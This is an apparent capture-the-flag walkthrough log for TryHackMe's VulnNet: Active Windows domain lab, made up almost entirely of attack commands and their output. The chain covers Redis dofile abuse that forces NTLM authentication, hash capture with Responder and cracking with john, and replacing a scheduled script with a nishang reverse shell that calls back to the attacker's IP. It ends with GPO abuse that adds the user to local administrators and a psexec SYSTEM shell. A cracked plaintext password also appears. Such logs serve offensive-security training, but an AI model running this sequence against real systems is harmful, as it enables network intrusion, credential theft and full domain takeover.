nmap -sV -p--Pn 10.10.22.71Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-0720:39 ESTNmap scan report for10.10.22.71Host is up (0.086s latency).Not shown: 65521 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds?464/tcp open kpasswd5?6379/tcp open redis Redis key-value store 2.8.24029389/tcp open mc-nmf .NET Message Framing49665/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPC49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049683/tcp open msrpc Microsoft Windows RPC49696/tcp open msrpc Microsoft Windows RPC49720/tcp open msrpc Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in221.02 seconds
enum4linux (smb enumeration)
impacket-rpcdump
redis enumeration
Redis version 2.8.2402 username is enterprise-security
responder (run this in another tab)
redis exploitation
smb credentials capturing
hashcracking
smb enumeration (authenticated)
smbclient
smbmap
nullinux https://github.com/m8sec/nullinux
smbclient
crackmapexec
shell access
Considering the naming of the "PurgeIrrelevantData_1826.ps1" file and the fact that we have READ/WRITE access, maybe that file is part of a scheduled task Download this https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 Add "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.191.227 -Port 4321" at the end of the script Upload it with name "PurgeIrrelevantData_1826.ps1"
enum4linux-ng -A 10.10.22.71
ENUM4LINUX - next generation (v1.3.2)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.22.71
[*] Username ......... ''
[*] Random Username .. 'emrlcivn'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Listener Scan on 10.10.22.71 |
====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.22.71 |
==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
========================================
| SMB Dialect Check on 10.10.22.71 |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
==========================================================
| Domain Information via SMB session for 10.10.22.71 |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET
========================================
| RPC Session Check on 10.10.22.71 |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==================================================
| Domain Information via RPC for 10.10.22.71 |
==================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member
==============================================
| OS Information via RPC for 10.10.22.71 |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
====================================
| Users via RPC on 10.10.22.71 |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=====================================
| Groups via RPC on 10.10.22.71 |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=====================================
| Shares via RPC on 10.10.22.71 |
=====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
========================================
| Policies via RPC for 10.10.22.71 |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
========================================
| Printers via RPC for 10.10.22.71 |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 31.42 seconds
sudo responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.191.227]
Responder IPv6 [fe80::7589:1b62:606e:6c09]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-ALXRPOCIKFA]
Responder Domain Name [XKFP.LOCAL]
Responder DCE-RPC Port [48193]
[+] Listening for events...
10.10.22.71:6379> EVAL "dofile('C:/Windows/System32/drivers/etc/Hosts')" 0
(error) ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): @user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#'
(0.78s)
10.10.22.71:6379> EVAL "dofile('C:/Users/enterprise-security/Desktop/user.txt')" 0
(error) ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): @user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'
Received in redis
EVAL "dofile('//10.9.191.227/test')" 0
(error) ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): @user_script:1: cannot open //10.9.191.227/test: Permission denied
(0.73s)
Received in responder
[SMB] NTLMv2-SSP Client : 10.10.22.71
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000
haiti 'enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000'
NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]
john --format=netntlmv2 -w=/usr/share/wordlists/rockyou.txt /home/kali/thm/vulnnetactive/hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498 (enterprise-security)
1g 0:00:00:01 DONE (2024-02-07 21:14) 0.5434g/s 2181Kp/s 2181Kc/s 2181KC/s sandoval69..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
smbclient -U enterprise-security -L ////10.10.141.42\\
Password for [WORKGROUP\enterprise-security]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.141.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbmap -u enterprise-security -p sand_0873959498 -H 10.10.141.42 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.141.42:445 Name: 10.10.141.42 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Enterprise-Share READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
nullinux -shares -u enterprise-security -p sand_0873959498 10.10.141.42
Starting nullinux v5.5.0dev | 02-07-2024 21:45
[*] Enumerating Shares for: 10.10.141.42
Shares Comments
-------------------------------------------
\\10.10.141.42\ADMIN$ Remote Admin
\\10.10.141.42\C$ Default share
\\10.10.141.42\Enterprise-Share
\\10.10.141.42\IPC$
\\10.10.141.42\NETLOGON Logon server share
\\10.10.141.42\SYSVOL Logon server share
[*] Enumerating: \\10.10.141.42\Enterprise-Share
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
[*] Enumerating: \\10.10.141.42\NETLOGON
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
[*] Enumerating: \\10.10.141.42\SYSVOL
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
[*] 0 unique user(s) identified
smbclient -I 10.10.141.42 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.141.42\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
9558271 blocks of size 4096. 5160889 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.8 kb/s) (average 1.8 kb/s)
smb: \> exit
------------
Get reverse shell
rlwrap nc -lnvp 4321
listening on [any] 4321 ...
ls
connect to [10.9.191.227] from (UNKNOWN) [10.10.69.113] 49909
Windows PowerShell running as user enterprise-security on VULNNET-BC3TCK1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\enterprise-security\Downloads>
Directory: C:\Users\enterprise-security\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2021 2:29 PM nssm-2.24-101-g897c7ad
d----- 2/26/2021 12:14 PM Redis-x64-2.8.2402
-a---- 2/26/2021 10:37 AM 143 startup.bat
PS C:\Users\enterprise-security\Downloads> whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Users\enterprise-security\Downloads> netstat -a -p TCP -o
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:135 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:389 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:445 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:464 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:593 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:636 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3268 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3269 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3389 VULNNET-BC3TCK1SHNQ:0 LISTENING 832
TCP 0.0.0.0:5985 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:6379 VULNNET-BC3TCK1SHNQ:0 LISTENING 384
TCP 0.0.0.0:9389 VULNNET-BC3TCK1SHNQ:0 LISTENING 2276
TCP 0.0.0.0:47001 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:49664 VULNNET-BC3TCK1SHNQ:0 LISTENING 636
TCP 0.0.0.0:49665 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49666 VULNNET-BC3TCK1SHNQ:0 LISTENING 1028
TCP 0.0.0.0:49667 VULNNET-BC3TCK1SHNQ:0 LISTENING 836
TCP 0.0.0.0:49669 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49670 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49684 VULNNET-BC3TCK1SHNQ:0 LISTENING 2232
TCP 0.0.0.0:49694 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 0.0.0.0:49699 VULNNET-BC3TCK1SHNQ:0 LISTENING 752
TCP 0.0.0.0:49710 VULNNET-BC3TCK1SHNQ:0 LISTENING 2352
TCP 10.10.69.113:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 10.10.69.113:139 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49704 ESTABLISHED 764
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49708 ESTABLISHED 764
TCP 10.10.69.113:49704 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49708 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49909 ip-10-9-191-227:4321 ESTABLISHED 3968
TCP 10.10.69.113:49986 VULNNET-BC3TCK1SHNQ:49669 TIME_WAIT 0
TCP 127.0.0.1:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
------------------------------
Get powerview and upload it
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
--2024-02-08 13:34:20-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[============================================================================>] 752.23K 2.60MB/s in 0.3s
2024-02-08 13:34:21 (2.60 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PowerView.ps1
putting file PowerView.ps1 as \PowerView.ps1 (759.1 kb/s) (average 759.1 kb/s)
---------
Import module
PS C:\Users\enterprise-security\Downloads> Import-Module C:\Enterprise-Share\PowerView.ps1
PS C:\Users\enterprise-security\Downloads> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : security-pol-vn
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 3
instancetype : 4
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 4
instancetype : 4
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
-------------------
smbclient -I 10.10.49.44 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.49.44\sysvol'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
9558271 blocks of size 4096. 5157762 blocks available
smb: \> cd vulnnet.local\Policies
smb: \vulnnet.local\Policies\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Tue Feb 23 04:30:37 2021
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Tue Feb 23 04:30:37 2021
9558271 blocks of size 4096. 5157753 blocks available
smb: \vulnnet.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
GPT.INI A 22 Tue Feb 23 04:36:27 2021
MACHINE D 0 Tue Feb 23 16:58:25 2021
USER D 0 Tue Feb 23 04:30:37 2021
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "makemeadmin" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN" --Force
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Modifying \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
----
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 3:01:37 PM
Password expires Never
Password changeable 2/24/2021 3:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/8/2024 11:10:09 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
--------
python psexec.py enterprise-security:sand_0873959498@10.10.49.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.49.44.....
[*] Found writable share ADMIN$
[*] Uploading file qludKPxL.exe
[*] Opening SVCManager on 10.10.49.44.....
[*] Creating service cvAd on 10.10.49.44.....
[*] Starting service cvAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system